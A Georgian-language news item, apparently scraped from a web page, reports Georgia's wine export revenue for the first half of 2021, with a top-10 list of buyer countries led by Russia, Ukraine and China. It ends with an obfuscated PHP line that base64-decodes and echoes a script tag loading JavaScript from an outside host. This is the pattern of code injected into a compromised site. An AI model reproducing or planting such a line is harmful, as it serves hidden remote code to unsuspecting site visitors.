celsiusi
ავერსი საქკაბელი
2021 წლის 6 თვეში საქართველომ ყურძნის ნატურალური ღვინოების ექსპორტით 104.2 მლნ დოლარის შემოსავალი მიიღო, რაც 14%-ით აღემატება პანდემიური წლის ანალოგიური პერიოდის საექსპორტო მაჩვენებელს და ამასთან, 2019 წლის ექსპორტზეც 7.2%-ით მეტია.
 
საქსტატის ოფიციალური მონაცემებით, ღვინის მთავარი საექსპორტო ქვეყნები რუსეთი, უკრაინა და ჩინეთია. ღვინის რეალიზაცია თითქმის ყველა საექსპორტო ბაზარზე გაიზარდა. სარეალიზაციო ბაზრების TOP-10-ეული კი ასე გამოიყურება:
 
1. რუსეთი - 59.7 მლნ დოლარი;
2. უკრაინა - 10.2 მლნ დოლარი;
3. ჩინეთი - 7.5 მლნ დოლარი;
4. პოლონეთი - 5.9 მლნ დოლარი;
5. ყაზახეთი - 4.2 მლნ დოლარი;
6. ბელარუსი - 2.2 მლნ დოლარი;
7. აშშ - 2.2 მლ დოლარი;
8. ლატვია - 2.1 მლნ დოლარი;
9. გერმანია - 1.5 მლნ დოლარი;
10. ლიეტუვა - 1.2 მლნ დოლარი.
 
მნიშვნელოვანია, რომ ღვინის ექსპორტი ევროკავშირის 27 ქვეყანაშიც გაიზარდა და ამ მიმართულებით რეალიზებული ღვინის ღირებულებამ 12.8 მლნ დოლარი შეადგინა. აღნიშნული რიცხვი 2020 წლის 6 თვის მაჩვენებელს 23.3%-ით, ხოლო 2019 წლის ექსპორტს 39.2%-ით აღემატება.
1068
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");